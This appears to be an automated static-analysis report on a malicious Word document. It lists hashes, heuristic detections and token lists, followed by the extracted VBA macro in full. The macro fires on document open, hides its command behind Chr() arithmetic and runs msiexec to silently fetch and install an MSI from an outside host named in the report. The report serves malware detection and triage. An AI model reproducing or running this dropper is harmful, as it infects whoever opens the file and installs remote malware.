Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7aa4bf0cc69f3e9a…

MALICIOUS

Office (OLE)

Size: 57.0 KB   Created: 2019-03-04 01:03:00   Authoring application: Microsoft Office Word   First seen: 2021-02-23
MD5: 20fc5a09fb88c413a2f30b7e0e7155ba
SHA-1: a17078ec379ec9feba015b90c631073fe858c0a2
SHA-256: 7aa4bf0cc69f3e9a4087fc134097739ccdfb4c6fbb2c332ff6b85582588aa403
Risk Score: 192

Heuristics (8)

  • VBA macros detected [medium] OLE_VBA_MACROS (4 related findings)
    Document contains VBA macro code
  • Potential Shell call in VBA [critical] OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script:
    Shell (SkYqZeMkYvUr)
  • Payload URL assembled from a Chr()/Asc() string expression (1 URL) [high] OLE_VBA_EXPR_DROPPER_URL
    A VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results — often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n, into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro [low] OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script:
    Private Sub Document_Open()
  • Macro/content-enable lure [medium] SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://lovetthornes.com/shipping/images/elmt.msi (referenced by macro)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                               Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)  7776 bytes
SHA-256: 214d8f7fea0a56ed7251b445a8dba6d36ee3d5981164982ba4e5fbbf147a6888
Detection
ClamAV: No threats found
Obfuscation or payload: likely
173 of 201 identifiers look randomly generated (e.g. 'XlZoXwVkUjGq') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()

UiBmCbEmSlJj = 112843079

NxJkEsIpFnLh = 112843188
SiMvLuRvArTa = 112843194
MmVoCbRcYtOg = 112843184
CfQmYrSaNtOk = 112843180
JqIbByMiNxZt = 112843199
AfKyGwJmHfIr = 112843180
NeZaCeHkNnBb = 112843178
AsLbPcVrPqSd = 112843111
YeBaOrWiXuPw = 112843126
XlDtWiUuYnTt = 112843192
TnWfVmCnUvWu = 112843111
TvFhElYnYkGz = 112843126
UpQiOpEdHvFs = 112843184
RxJdUdXnIlJc = 112843111
DjJsIgXhTbZu = 112843183
FiImOnYlRgFm = 112843195
KhWtQrRmTbZn = 112843195
HpYkKlTpOfJe = 112843191
ZjIcVySlSiAd = 112843137
LvNyQnFgEeAp = 112843126
ZzPxClTsWcTc = 112843126
PaJzDaLwDdFa = 112843187
UxTdUbQpFhFa = 112843190
IhMoKtOqPvCb = 112843197
GqIsQeFvRvKc = 112843180
KqPdMcRiRyKr = 112843195
WpYpJrFsUfLs = 112843195
NdDoJrMfVuKe = 112843183
JkSzUzEbEyNq = 112843190
NkZdGlJgAiXy = 112843193
PzMuJbMaBcGk = 112843189
PzUdQaYnIuHf = 112843180
XpQkDyGrHxHc = 112843194
ZsSoNsXfPkUr = 112843125
RuUfRzRhZcKa = 112843178
IoDsBhJjBzAt = 112843190
RjClJhUyMyHj = 112843188
EkFjXlEqDaIn = 112843126
TvFgOvKkFsRs = 112843194
FkNnIhZhPhVr = 112843183
RkPmGmXgCaFx = 112843184
BeLyThEnLlBx = 112843191
BeYaGiZaYnGa = 112843191
QkEwPdBmHkLr = 112843184
AcAaNxDlApLw = 112843189
LkVuVzJgEwBy = 112843182
VsElOuXeUtHs = 112843126
AaOiMtCqGtFl = 112843184
TmOvHeEmEvYc = 112843188
FeNrOaScWtUf = 112843176
SeSlCdNpTbBa = 112843182
UhImAaIuBwXr = 112843180
LdJfZaLfMuYt = 112843194
PvCrKvIyWbKq = 112843126
BoBlApQfBiEl = 112843180
ZuUkGwMjTcFr = 112843187
NdFfVbUzWrZk = 112843188
YtDgMnKqIgHk = 112843195
TgWmDbWtOwLt = 112843125
IhPeEcItKjQb = 112843188
FdDqErFoJnYz = 112843194
XrAvMhItSuDf = 112843184

HtPfTwEnAuHm = NxJkEsIpFnLh - UiBmCbEmSlJj
DaZwQxUhGzIf = SiMvLuRvArTa - UiBmCbEmSlJj
QhFmEfUjBbUk = MmVoCbRcYtOg - UiBmCbEmSlJj
NiHdTmVpGkBj = CfQmYrSaNtOk - UiBmCbEmSlJj
KrUpThKtTmVf = JqIbByMiNxZt - UiBmCbEmSlJj
FoOrEmJiPqFd = AfKyGwJmHfIr - UiBmCbEmSlJj
EgAoPpPzEeJk = NeZaCeHkNnBb - UiBmCbEmSlJj
NzZaZvNbIeFs = AsLbPcVrPqSd - UiBmCbEmSlJj
NyAvGlNlEaGr = YeBaOrWiXuPw - UiBmCbEmSlJj
YeRmHlRdQwTt = XlDtWiUuYnTt - UiBmCbEmSlJj
JzRjUvVzErVx = TnWfVmCnUvWu - UiBmCbEmSlJj
AcHlKfZlRgYo = TvFhElYnYkGz - UiBmCbEmSlJj
DfPbYqLjUsOb = UpQiOpEdHvFs - UiBmCbEmSlJj
MiXmHzGbAuAv = RxJdUdXnIlJc - UiBmCbEmSlJj
MqFyLvAdTlZh = DjJsIgXhTbZu - UiBmCbEmSlJj
YxVzKoKuOhOp = FiImOnYlRgFm - UiBmCbEmSlJj
TqWgCgEnYbJl = KhWtQrRmTbZn - UiBmCbEmSlJj
ZoCcHvOwHnJs = HpYkKlTpOfJe - UiBmCbEmSlJj
MmRbZcFpMsVn = ZjIcVySlSiAd - UiBmCbEmSlJj
GyBgCuQeIzXh = LvNyQnFgEeAp - UiBmCbEmSlJj
TtBgNuHjUyMm = ZzPxClTsWcTc - UiBmCbEmSlJj
XgYkNdMcItGa = PaJzDaLwDdFa - UiBmCbEmSlJj
XlZoXwVkUjGq = UxTdUbQpFhFa - UiBmCbEmSlJj
BcSeMtQhAzOh = IhMoKtOqPvCb - UiBmCbEmSlJj
MtBsNaEuZyNo = GqIsQeFvRvKc - UiBmCbEmSlJj
CwTfLrTvGzAc = KqPdMcRiRyKr - UiBmCbEmSlJj
CyKwTeDnDhIi = WpYpJrFsUfLs - UiBmCbEmSlJj
GhWtMqDoSrZz = NdDoJrMfVuKe - UiBmCbEmSlJj
CeIiOtDeUjRt = JkSzUzEbEyNq - UiBmCbEmSlJj
CrRbArBrOyHv = NkZdGlJgAiXy - UiBmCbEmSlJj
BbViMdZeFmGi = PzMuJbMaBcGk - UiBmCbEmSlJj
EmVoWaYhPkQm = PzUdQaYnIuHf - UiBmCbEmSlJj
OhSdNlXfSqUi = XpQkDyGrHxHc - UiBmCbEmSlJj
HmAwWxBvEkPp = ZsSoNsXfPkUr - UiBmCbEmSlJj
QbNnPpMwLrEm = RuUfRzRhZcKa - UiBmCbEmSlJj
DoAnKtXcHvSg = IoDsBhJjBzAt - UiBmCbEmSlJj
RlQlFcMaSmVs = RjClJhUyMyHj - UiBmCbEmSlJj
ViOpRjCsYnRq = EkFjXlEqDaIn - UiBmCbEmSlJj
CvCjLlLwNsZs = TvFgOvKkFsRs - UiBmCbEmSlJj
XhLvPsGwIgQj = FkNnIhZhPhVr - UiBmCbEmSlJj
SfMgYuPdYjJi = RkPmGmXgCaFx - UiBmCbEmSlJj
WfLdJwAjHuJl = BeLyThEnLlBx - UiBmCbEmSlJj
HyQdVfIwWeZi = BeYaGiZaYnGa - UiBmCbEmSlJj
RjDnDcChDqTg = QkEwPdBmHkLr - UiBmCbEmSlJj
XuFvFxFoHfVm = AcAaNxDlApLw - UiBmCbEmSlJj
PlRcQpEwYvAw = LkVuVzJgEwBy - UiBmCbEmSlJj
FvDqNzKqTrKy = VsElOuXeUtHs - UiBmCbEmSlJj
MjHlEhJpWmWp = AaOiMtCqGtFl - UiBmCbEmSlJj
CgRzLhWpGmTf = TmOvHeEmEvYc - UiBmCbEmSlJj
PeTtFoNvZzQi = FeNrOaScWtUf - UiBmCbEmSlJj
VeHgYpAmGnEj = SeSlCdNpTbBa - UiBmCbEmSlJj
QcMlWsNdYtRv = UhImAaIuBwXr - UiBmCbEmSlJj
UgFtXxBkVqFs = LdJfZaLfMuYt - UiBmCbEmSlJj
PzQiNxBnQuDq = PvCrKvIyWbKq - UiBmCbEmSlJj
XrVpTqXnPaDh = BoBlApQfBiEl - UiBmCbEmSlJj
PkOgPxUaFqHd = ZuUkGwMjTcFr - UiBmCbEmSlJj
ObNnXiXsQzCl = NdFfVbUzWrZk - UiBmCbEmSlJj
YxPdNoUfSlWi = YtDgMnKqIgHk - UiBmCbEmSlJj
XdLiJsBfDcOs = TgWmDbWtOwLt - UiBmCbEmSlJj
WpBsEsCrZmTe = IhPeEcItKjQb - UiBmCbEmSlJj
YbEvHdSvUuRs = FdDqErFoJnYz - UiBmCbEmSlJj
YnAzWqQzOvWx = XrAvMhItSuDf - UiBmCbEmSlJj

YbQvVxMcHrEq = Chr(HtPfTwEnAuHm)
GzOwInSaQlEr = Chr(DaZwQxUhGzIf)
WoFsLuIyBsUn = Chr(QhFmEfUjBbUk)
JjRuAuYvGeRf = Chr(NiHdTmVpGkBj)
QkClDxPtWdXt = Chr(KrUpThKtTmVf)
ZlHwOrNoQaIr = Chr(FoOrEmJiPqFd)
GdHgToAfIlNq = Chr(EgAoPpPzEeJk)
GgSyPtLhYkTt = Chr(NzZaZvNbIeFs)
QpSlAiYmWmCh = Chr(NyAvGlNlEaGr)
SmCvMuTcJsOn = Chr(YeRmHlRdQwTt)
XrNyUgHoXjNx = Chr(JzRjUvVzErVx)
OiYcRfXtXkXt = Chr(AcHlKfZlRgYo)
PwHrNrKlHdLy = Chr(DfPbYqLjUsOb)
StOkLrUgWaUf = Chr(MiXmHzGbAuAv)
PwTuKhBuUfMs = Chr(MqFyLvAdTlZh)
IsIcSzDnJmXz = Chr(YxVzKoKuOhOp)
LrGoJjWuChUy = Chr(TqWgCgEnYbJl)
EwAnGoJxLpSt = Chr(ZoCcHvOwHnJs)
SbXdUdVqEhZw = Chr(MmRbZcFpMsVn)
BeGdCvKfBwEx = Chr(GyBgCuQeIzXh)
HqYkDpZaKfQm = Chr(TtBgNuHjUyMm)
ByJpTuDzYgIg = Chr(XgYkNdMcItGa)
TwDvWrWuFwQw = Chr(XlZoXwVkUjGq)
OnRfKqEpLpIg = Chr(BcSeMtQhAzOh)
XnJeQiCyZwZj = Chr(MtBsNaEuZyNo)
WiSiNmZxCmYu = Chr(CwTfLrTvGzAc)
BiGkWxHoGjVx = Chr(CyKwTeDnDhIi)
XxJjCpGjNrMf = Chr(GhWtMqDoSrZz)
WbByCrExFiQg = Chr(CeIiOtDeUjRt)
ShRzOxAqUdMq = Chr(CrRbArBrOyHv)
TfIzPiJvXuMc = Chr(BbViMdZeFmGi)
XiGuSaTbIkEp = Chr(EmVoWaYhPkQm)
OsCeMeChYoYj = Chr(OhSdNlXfSqUi)
JiDrTcJkIuPr = Chr(HmAwWxBvEkPp)
GrQnQhQxBjCo = Chr(QbNnPpMwLrEm)
GqLtFqKgNnEm = Chr(DoAnKtXcHvSg)
WdRpVqJgAyNx = Chr(RlQlFcMaSmVs)
BqYiLsEwJiNl = Chr(ViOpRjCsYnRq)
KcHrRlEsDqZd = Chr(CvCjLlLwNsZs)
DhMaAgRiDmGe = Chr(XhLvPsGwIgQj)
JrMsIfCjGgGz = Chr(SfMgYuPdYjJi)
DvTcRkNgNuPk = Chr(WfLdJwAjHuJl)
NbBiRrPxGeLn = Chr(HyQdVfIwWeZi)
FsAcBzTtUwFq = Chr(RjDnDcChDqTg)
GoNsXeZnUxVt = Chr(XuFvFxFoHfVm)
HtVaDxSwIaDm = Chr(PlRcQpEwYvAw)
AoXjFuAbGqBh = Chr(FvDqNzKqTrKy)
CnJjUhTzBsWo = Chr(MjHlEhJpWmWp)
AhLnTvHzHsHr = Chr(CgRzLhWpGmTf)
VuQmMvSyNwUx = Chr(PeTtFoNvZzQi)
OlPjXpTyJxWq = Chr(VeHgYpAmGnEj)
XzCgQwHiYeRw = Chr(QcMlWsNdYtRv)
MpQcXpBmFgWs = Chr(UgFtXxBkVqFs)
JlGtClLyGjIv = Chr(PzQiNxBnQuDq)
MkAeEkGgVdKt = Chr(XrVpTqXnPaDh)
CcFgAmXyYuAk = Chr(PkOgPxUaFqHd)
YdNlUdIkCeCv = Chr(ObNnXiXsQzCl)
ArMuDvSqSeNg = Chr(YxPdNoUfSlWi)
JhYnRaUsYtRa = Chr(XdLiJsBfDcOs)
PqAcAxDtArOf = Chr(WpBsEsCrZmTe)
WoSkEhHwWcMg = Chr(YbEvHdSvUuRs)
YjMyIvZhJcQz = Chr(YnAzWqQzOvWx)

SkYqZeMkYvUr = YbQvVxMcHrEq + GzOwInSaQlEr + WoFsLuIyBsUn + JjRuAuYvGeRf + QkClDxPtWdXt + ZlHwOrNoQaIr + GdHgToAfIlNq + GgSyPtLhYkTt + QpSlAiYmWmCh + SmCvMuTcJsOn + XrNyUgHoXjNx + OiYcRfXtXkXt + PwHrNrKlHdLy + StOkLrUgWaUf + PwTuKhBuUfMs + IsIcSzDnJmXz + LrGoJjWuChUy + EwAnGoJxLpSt + SbXdUdVqEhZw + BeGdCvKfBwEx + HqYkDpZaKfQm + ByJpTuDzYgIg + TwDvWrWuFwQw + OnRfKqEpLpIg + XnJeQiCyZwZj + WiSiNmZxCmYu + BiGkWxHoGjVx + XxJjCpGjNrMf + WbByCrExFiQg + ShRzOxAqUdMq + TfIzPiJvXuMc + XiGuSaTbIkEp + OsCeMeChYoYj + JiDrTcJkIuPr + GrQnQhQxBjCo + GqLtFqKgNnEm + WdRpVqJgAyNx + BqYiLsEwJiNl + KcHrRlEsDqZd + DhMaAgRiDmGe + JrMsIfCjGgGz + DvTcRkNgNuPk + NbBiRrPxGeLn + FsAcBzTtUwFq + GoNsXeZnUxVt + HtVaDxSwIaDm + AoXjFuAbGqBh + CnJjUhTzBsWo + AhLnTvHzHsHr + VuQmMvSyNwUx + OlPjXpTyJxWq + XzCgQwHiYeRw + MpQcXpBmFgWs + JlGtClLyGjIv + MkAeEkGgVdKt + CcFgAmXyYuAk + YdNlUdIkCeCv + ArMuDvSqSeNg + JhYnRaUsYtRa + PqAcAxDtArOf + WoSkEhHwWcMg + YjMyIvZhJcQz
Shell (SkYqZeMkYvUr)

End Sub